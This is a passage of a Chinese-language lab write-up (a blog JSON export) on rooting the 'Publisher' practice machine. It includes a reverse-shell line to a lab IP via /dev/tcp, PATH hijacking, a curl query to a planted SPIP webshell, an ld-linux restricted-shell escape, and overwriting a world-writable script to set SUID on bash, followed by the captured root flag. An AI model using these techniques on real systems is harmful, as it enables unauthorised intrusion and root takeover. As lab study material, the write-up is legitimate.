9.4.0\ncrtstuff.c\nderegister_tm_clones\n__do_global_dtors_aux\ncompleted.8061\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\nrun_container.c\n__FRAME_END__\n__init_array_end\n_DYNAMIC\n__init_array_start\n__GNU_EH_FRAME_HDR\n_GLOBAL_OFFSET_TABLE_\n__libc_csu_fini\n_ITM_deregisterTMCloneTable\n_edata\n__stack_chk_fail@@GLIBC_2.4\n__libc_start_main@@GLIBC_2.2.5\nexecve@@GLIBC_2.2.5\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\n__libc_csu_init\n__bss_start\nmain\n__TMC_END__\n_ITM_registerTMCloneTable\n__cxa_finalize@@GLIBC_2.2.5\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.gnu.property\n.note.gnu.build-id\n.note.ABI-tag\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rela.dyn\n.rela.plt\n.init\n.plt.got\n.plt.sec\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.dynamic\n.data\n.bss\n.comment<\/code><\/pre>\n<p>\u53d1\u73b0\u5b58\u5728\u654f\u611f\u7684<code>\/bin\/bash<\/code>\u548c<code>\/opt\/run_container.sh<\/code>\uff0c\u53ef\u80fd\u662f\u8981\u6267\u884c\u7684\uff01<\/p>\n<pre><code class=\"language-bash\">think@publisher:~$ ls -la \/opt\/run_container.sh\n-rwxrwxrwx 1 root root 1715 Mar 29 13:25 \/opt\/run_container.sh\nthink@publisher:~$ cat \/opt\/run_container.sh\ncat: \/opt\/run_container.sh: Permission denied\nthink@publisher:~$ ls -la \/opt\nls: cannot open directory &#039;\/opt&#039;: Permission denied\nthink@publisher:~$ getfacl \/opt\ngetfacl: Removing leading &#039;\/&#039; from absolute path names\n# file: opt\n# owner: root\n# group: root\nuser::rwx\ngroup::r-x\nother::r-x<\/code><\/pre>\n<p>\u5565\u60c5\u51b5\u548b\u8bfb\u53d6\u4e0d\u4e86\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u8fd0\u884c\u4e00\u4e0b\uff0c\u53d1\u73b0\u6743\u9650\u4e5f\u4e0d\u591f\u3002\u3002\u3002\u3002\u4f20\u5230\u672c\u5730\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">think@publisher:\/tmp$ cp \/usr\/sbin\/run_container .<\/code><\/pre>\n<p>\u7136\u540e\u4f20\u8fc7\u6765\uff0c\u53cd\u7f16\u8bd1\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rbp\n  int result; \/\/ eax\n  unsigned __int64 v5; \/\/ rdx\n  unsigned __int64 v6; \/\/ rt1\n  const char *v7; \/\/ [rsp-38h] [rbp-38h]\n  const char *v8; \/\/ [rsp-30h] [rbp-30h]\n  const char *v9; \/\/ [rsp-28h] [rbp-28h]\n  const char *v10; \/\/ [rsp-20h] [rbp-20h]\n  __int64 v11; \/\/ [rsp-18h] [rbp-18h]\n  unsigned __int64 v12; \/\/ [rsp-10h] [rbp-10h]\n  __int64 v13; \/\/ [rsp-8h] [rbp-8h]\n\n  __asm { endbr64 }\n  v13 = v3;\n  v12 = __readfsqword(0x28u);\n  v7 = &quot;\/bin\/bash&quot;;\n  v8 = &quot;-p&quot;;\n  v9 = &quot;\/opt\/run_container.sh&quot;;\n  v10 = argv[1];\n  v11 = 0LL;\n  sub_1070(&quot;\/bin\/bash&quot;, &amp;v7, 0LL);\n  result = 0;\n  v6 = __readfsqword(0x28u);\n  v5 = v6 ^ v12;\n  if ( v6 != v12 )\n    result = sub_1060(&quot;\/bin\/bash&quot;, &amp;v7, v5);\n  return result;\n}<\/code><\/pre>\n<p>\u597d\u50cf\u662f\u8c03\u7528\u4e86bash\uff0c\u7136\u540e\u8fd0\u884c\u7a0b\u5e8f\uff1f\u8fd9\u4e2a\u65f6\u5019\u610f\u8bc6\u5230think\u7528\u6237\u5e76\u4e0d\u662fbash\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">think@publisher:\/tmp$ env\nSHELL=\/usr\/sbin\/ash\nPWD=\/tmp\nLOGNAME=think\nXDG_SESSION_TYPE=tty\nMOTD_SHOWN=pam\nHOME=\/home\/think\nLANG=en_US.UTF-8\nLS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:\nSSH_CONNECTION=192.168.0.143 47128 192.168.0.188 22\nLESSCLOSE=\/usr\/bin\/lesspipe %s %s\nXDG_SESSION_CLASS=user\nTERM=xterm-256color\nLESSOPEN=| \/usr\/bin\/lesspipe %s\nUSER=think\nSHLVL=2\nXDG_SESSION_ID=7\nXDG_RUNTIME_DIR=\/run\/user\/1000\nSSH_CLIENT=192.168.0.143 47128 22\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin\nDBUS_SESSION_BUS_ADDRESS=unix:path=\/run\/user\/1000\/bus\nSSH_TTY=\/dev\/pts\/0\n_=\/usr\/bin\/env\nOLDPWD=\/home\/think\nthink@publisher:\/tmp$ cat \/etc\/passwd | grep &quot;think&quot;\nthink:x:1000:1000:,,,:\/home\/think:\/usr\/sbin\/ash<\/code><\/pre>\n<p>\u662f\u4e2aash\uff0c\u5c1d\u8bd5\u641e\u5230bash\u3002\u3002\u3002\u3002\u3002\u4e0a\u4f20linpeas.sh.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724889.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724889.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710155711561\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u4e0d\u77e5\u9053\u548b\u6574\uff0c\u5c1d\u8bd5\u5f39\u5230<code>pwncat-cs<\/code>\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724890.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724890.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710160527018\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u80fd\u81ea\u52a8\u5904\u7406\u5230bash\u3002\u3002\u3002\u3002\u3002\u5bc4\uff0c\u5c1d\u8bd5\u6267\u884c\u4e86\u4e00\u4e0b\u3002\u53d1\u73b0<code>.sh<\/code>\u5c45\u7136\u53ef\u4ee5\u6267\u884c\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">think@publisher:~$ \/opt\/run_container.sh\npermission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Get &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/json?all=1&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\ndocker: permission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Post &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/create&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied.\nSee &#039;docker run --help&#039;.\nList of Docker containers:\npermission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Get &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/json?all=1&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\n\nEnter the ID of the container or leave blank to create a new one: 123456\n\/opt\/run_container.sh: line 16: validate_container_id: command not found\n\nOPTIONS:\n1) Start Container\n2) Stop Container\n3) Restart Container\n4) Create Container\n5) Quit\nChoose an action for a container: <\/code><\/pre>\n<p>\u663e\u793a\u9700\u8981\u4e00\u4e2a<code>ID<\/code>\uff0c\u4e14\u662fdocker\u8fdb\u884c\u8fd0\u884c\u7684\u3002\u3002\u3002\u53d1\u73b0\u6709\u4e2a\u547d\u4ee4\u627e\u4e0d\u5230\uff0c\u8fdb\u884c\u52ab\u6301\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">think@publisher:\/tmp$ touch validate_container_id\nthink@publisher:\/tmp$ nano validate_container_id\nthink@publisher:\/tmp$ cat validate_container_id \n#!\/bin\/bash\n\nbash -i &amp;&gt;\/dev\/tcp\/192.168.0.143\/1234 &lt;&amp;1\nthink@publisher:\/tmp$ echo $PATH\n\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin\nthink@publisher:\/tmp$ PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin:\/tmp\nthink@publisher:\/tmp$ cd \/\nthink@publisher:\/$ validate_container_id\n-ash: \/tmp\/validate_container_id: Permission denied<\/code><\/pre>\n<p>\u5c1d\u8bd5\u6267\u884c\u547d\u4ee4\uff01<\/p>\n<pre><code class=\"language-bash\">think@publisher:\/$ \/opt\/run_container.sh\npermission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Get &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/json?all=1&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\ndocker: permission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Post &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/create&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied.\nSee &#039;docker run --help&#039;.\nList of Docker containers:\npermission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Get &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/json?all=1&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\n\nEnter the ID of the container or leave blank to create a new one: 123456\n\/opt\/run_container.sh: line 16: \/tmp\/validate_container_id: Permission denied\n\nOPTIONS:\n1) Start Container\n2) Stop Container\n3) Restart Container\n4) Create Container\n5) Quit\nChoose an action for a container: 1\npermission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Post &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/123456\/start&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\nError: failed to start containers: 123456<\/code><\/pre>\n<p>\u53d1\u73b0\u627e\u4e0d\u5230\uff0c\uff08\u770b\u7fa4\u53cb\u7684wp\u53d1\u73b0\u7684\uff09\u5c1d\u8bd5\u770b\u4e00\u4e0b\u524d\u9762\u7684SPIP\u5f97\u5230\u7684\u90a3\u4e2a\u662f\u4e0d\u662f\u6709\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ curl &quot;http:\/\/$IP\/spip\/webshell.php?0=whoami;id;hostname&quot;\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n41c976e507f8<\/code><\/pre>\n<p>\u627e\u5230ID\uff0c\u5c1d\u8bd5\u6267\u884c\uff0c\u4f46\u662f\u6ca1\u6548\u679c\uff0c\u8d4b\u4e88\u6267\u884c\u6743\u9650\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724891.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724891.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710171715758\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724892.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407101724892.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710171726046\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u53ef\u4ee5\u8bfb\u53d6\u4e86\uff0c\u5c1d\u8bd5\u4fee\u6539\uff01<\/p>\n<h3>bash -p<\/h3>\n<p>\u63a5\u4e0b\u6765\u5c31\u53ef\u4ee5\u6b63\u5e38\u4fee\u6539\uff0c\u6267\u884c\u524d\u9762\u7684suid\u6587\u4ef6\u8fdb\u884c\u63d0\u6743\u4e86\uff01<\/p>\n<pre><code class=\"language-bash\">(remote) think@publisher:\/tmp$ cat \/opt\/run_container.sh\n#!\/bin\/bash\n\n# Function to list Docker containers\nlist_containers() {\n    if [ -z &quot;$(docker ps -aq)&quot; ]; then\n        docker run -d --restart always -p 8000:8000 -v \/home\/think:\/home\/think 4b5aec41d6ef;\n    fi\n    echo &quot;List of Docker containers:&quot;\n    docker ps -a --format &quot;ID: {{.ID}} | Name: {{.Names}} | Status: {{.Status}}&quot;\n    echo &quot;&quot;\n}\n\n# Function to prompt user for container ID\nprompt_container_id() {\n    read -p &quot;Enter the ID of the container or leave blank to create a new one: &quot; container_id\n    validate_container_id &quot;$container_id&quot;\n}\n\n# Function to display options and perform actions\nselect_action() {\n    echo &quot;&quot;\n    echo &quot;OPTIONS:&quot;\n    local container_id=&quot;$1&quot;\n    PS3=&quot;Choose an action for a container: &quot;\n    options=(&quot;Start Container&quot; &quot;Stop Container&quot; &quot;Restart Container&quot; &quot;Create Container&quot; &quot;Quit&quot;)\n\n    select opt in &quot;${options[@]}&quot;; do\n        case $REPLY in\n            1) docker start &quot;$container_id&quot;; break ;;\n            2)  if [ $(docker ps -q | wc -l) -lt 2 ]; then\n                    echo &quot;No enough containers are currently running.&quot;\n                    exit 1\n                fi\n                docker stop &quot;$container_id&quot;\n                break ;;\n            3) docker restart &quot;$container_id&quot;; break ;;\n            4) echo &quot;Creating a new container...&quot;\n               docker run -d --restart always -p 80:80 -v \/home\/think:\/home\/think spip-image:latest \n               break ;;\n            5) echo &quot;Exiting...&quot;; exit ;;\n            *) echo &quot;Invalid option. Please choose a valid option.&quot; ;;\n        esac\n    done\n}\n\n# Main script execution\nlist_containers\nprompt_container_id  # Get the container ID from prompt_container_id function\nselect_action &quot;$container_id&quot;  # Pass the container ID to select_action function\n(remote) think@publisher:\/tmp$ echo &#039;#!\/bin\/bash&#039; &gt; \/opt\/run_container.sh\n(remote) think@publisher:\/tmp$ echo &#039;chmod +s \/bin\/bash&#039; &gt;&gt; \/opt\/run_container.sh\n(remote) think@publisher:\/tmp$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1183448 Apr 18  2022 \/bin\/bash\n(remote) think@publisher:\/tmp$ \/usr\/sbin\/run_container\n(remote) think@publisher:\/tmp$ ls -la \/bin\/bash\n-rwsr-sr-x 1 root root 1183448 Apr 18  2022 \/bin\/bash\n(remote) think@publisher:\/tmp$ bash -p\n(remote) root@publisher:\/tmp# cd ~\n(remote) root@publisher:\/home\/think# ls -la\ntotal 48\ndrwxr-xr-x 8 think    think    4096 Feb 10 21:27 .\ndrwxr-xr-x 3 root     root     4096 Nov 13  2023 ..\nlrwxrwxrwx 1 root     root        9 Jun 21  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 think    think     220 Nov 14  2023 .bash_logout\n-rw-r--r-- 1 think    think    3771 Nov 14  2023 .bashrc\ndrwx------ 2 think    think    4096 Nov 14  2023 .cache\ndrwx------ 3 think    think    4096 Dec  8  2023 .config\ndrwx------ 3 think    think    4096 Jul 10 07:50 .gnupg\ndrwxrwxr-x 3 think    think    4096 Jan 10 12:46 .local\n-rw-r--r-- 1 think    think     807 Nov 14  2023 .profile\nlrwxrwxrwx 1 think    think       9 Feb 10 21:27 .python_history -&gt; \/dev\/null\ndrwxr-x--- 5 www-data www-data 4096 Dec 20  2023 spip\ndrwxr-xr-x 2 think    think    4096 Jan 10 12:54 .ssh\n-rw-r--r-- 1 root     root       35 Feb 10 21:20 user.txt\nlrwxrwxrwx 1 think    think       9 Feb 10 21:27 .viminfo -&gt; \/dev\/null\n(remote) root@publisher:\/home\/think# whoami;id\nroot\nuid=1000(think) gid=1000(think) euid=0(root) egid=0(root) groups=0(root),1000(think)\n(remote) root@publisher:\/home\/think# cd \/root\n(remote) root@publisher:\/root# ls -la\ntotal 56\ndrwx------  7 root  root   4096 Mar 29 13:25 .\ndrwxr-xr-x 18 root  root   4096 Nov 14  2023 ..\nlrwxrwxrwx  1 root  root      9 Jun  2  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root  root   3246 Jun 21  2023 .bashrc\ndrwx------  2 root  root   4096 Nov 11  2023 .cache\ndrwx------  3 root  root   4096 Dec  8  2023 .config\ndrwxr-xr-x  3 root  root   4096 Jun 21  2023 .local\nlrwxrwxrwx  1 root  root      9 Nov 11  2023 .mysql_history -&gt; \/dev\/null\n-rw-r--r--  1 root  root    161 Dec  5  2019 .profile\n-rw-r-----  1 root  root     35 Feb 10 21:20 root.txt\n-rw-r--r--  1 root  root     75 Nov 13  2023 .selected_editor\ndrwxr-x---  5 think think  4096 Dec  7  2023 spip\ndrwx------  2 root  root   4096 Dec 20  2023 .ssh\n-rw-rw-rw-  1 root  root  11913 Mar 29 13:25 .viminfo\n(remote) root@publisher:\/root# cat root.txt \n3a4225cc9e85709adda6ef55d6a4f2ca<\/code><\/pre>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<p>\u8fd9\u91cc\u770b\u5230\u4f5c\u8005\u91c7\u7528\u7684\u662f\u4f7f\u7528\u52a8\u6001\u94fe\u63a5\u5e93\u751f\u6210\u4e00\u4e2abash\u7684shell\uff0c\u5f88\u65b9\u904d\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">\/lib\/x86_64-linux-gnu\/ld-linux-x86\u201364.so.2 \/bin\/bash<\/code><\/pre>\n<p>\u8fd9\u91cc\u56e0\u5730\u5236\u5b9c\u91c7\u7528\u4e0d\u540c\u540d\u7684\u6587\u4ef6\u8fdb\u884c\u4fee\u6539\uff1a<\/p>\n<pre><code class=\"language-bash\">think@publisher:\/tmp$ ls \/lib\/x86_64-linux-gnu\/ | grep &#039;x86-64&#039;\nld-linux-x86-64.so.2\nlibpyldb-util.cpython-38-x86-64-linux-gnu.so.2\nlibpyldb-util.cpython-38-x86-64-linux-gnu.so.2.4.4\nlibpytalloc-util.cpython-38-x86-64-linux-gnu.so.2\nlibpytalloc-util.cpython-38-x86-64-linux-gnu.so.2.3.3\nlibsamba-policy.cpython-38-x86-64-linux-gnu.so.0\nlibsamba-policy.cpython-38-x86-64-linux-gnu.so.0.0.1\nthink@publisher:\/tmp$ \/lib\/x86_64-linux-gnu\/ld-linux-x86-64.so.2 \/bin\/bash\nthink@publisher:\/tmp$ echo $SHELL\n\/usr\/sbin\/ash\nthink@publisher:\/tmp$ cd \/opt\nthink@publisher:\/opt$ ls -la\ntotal 20\ndrwxr-xr-x  3 root root 4096 Mar 29 13:25 .\ndrwxr-xr-x 18 root root 4096 Nov 14  2023 ..\ndrwx--x--x  4 root root 4096 Nov 14  2023 containerd\n-rw-r--r--  1 root root  861 Dec  7  2023 dockerfile\n-rwxrwxrwx  1 root root   31 Jul 10 09:19 run_container.sh<\/code><\/pre>\n<p>\u4e5f\u8fbe\u5230\u4e86\u548c\u4e4b\u524d\u4e00\u6837\u7684\u6548\u679c\uff01\uff01\uff01\u725b\u903c\uff01\uff01\uff01<\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/github.com\/Brntpcnr\/WriteupsHMV\/blob\/main\/Publisher.txt\">https:\/\/github.com\/Brntpcnr\/WriteupsHMV\/blob\/main\/Publisher.txt<\/a><\/p>\n<p><a href=\"https:\/\/blog.findtodd.com\/2024\/06\/19\/hmv-Publisher\/\">https:\/\/blog.findtodd.com\/2024\/06\/19\/hmv-Publisher\/<\/a><\/p>\n<p><a href=\"https:\/\/medium.com\/@josemlwdf\/publisher-cccb172abd8e\">https:\/\/medium.com\/@josemlwdf\/publisher-cccb172abd8e<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Publisher \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/publisher] \u2514 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-750","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/750","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=750"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/750\/revisions"}],"predecessor-version":[{"id":751,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/750\/revisions\/751"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=750"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=750"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=750"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}